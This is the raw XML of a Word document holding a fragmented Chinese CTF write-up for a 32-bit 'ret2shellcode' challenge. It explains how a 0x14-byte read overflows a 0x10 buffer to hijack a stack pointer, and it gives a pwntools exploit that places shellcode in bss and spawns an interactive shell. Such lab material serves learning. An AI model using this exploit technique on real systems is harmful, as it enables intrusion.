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ida反汇编中显示puts结束就return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="14668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然而在汇编中还有一个跳转操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="34480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80486EF的内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="421957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这里改变了两次栈顶的位置，第一次esp改成ebp-8也就是v3指针的位置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="20859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pop将v3的内容弹到ecx，之后esp改成ecx-4，再reurn到该地址空间所保存的地址上</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1304925" cy="133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注意到栈上的s只有0x10的空间，read读入0x14正好可以覆盖v3指针，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故可导致任意地址的跳转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只要构造好payload就可以跳转到shellcode执行，exp在下页给出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= process("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ret2shellcode_32_plus")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shellcode = asm(shellcraft.sh())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s_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>bss = 0x804A040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sh.recv()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sh.sendline(p32(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>bss+4)+shellcode)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sh.recv()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sh.sendline('yes\x0a'+'\x00'*12+p32(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>bss+4))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sh.interactive()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16749"/>
    <w:rsid w:val="79E1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2019-12-26T04:48:00Z</dcterms:created>
  <dc:creator>ねこ</dc:creator>
  <cp:lastModifiedBy>ねこ</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-26T05:11:20Z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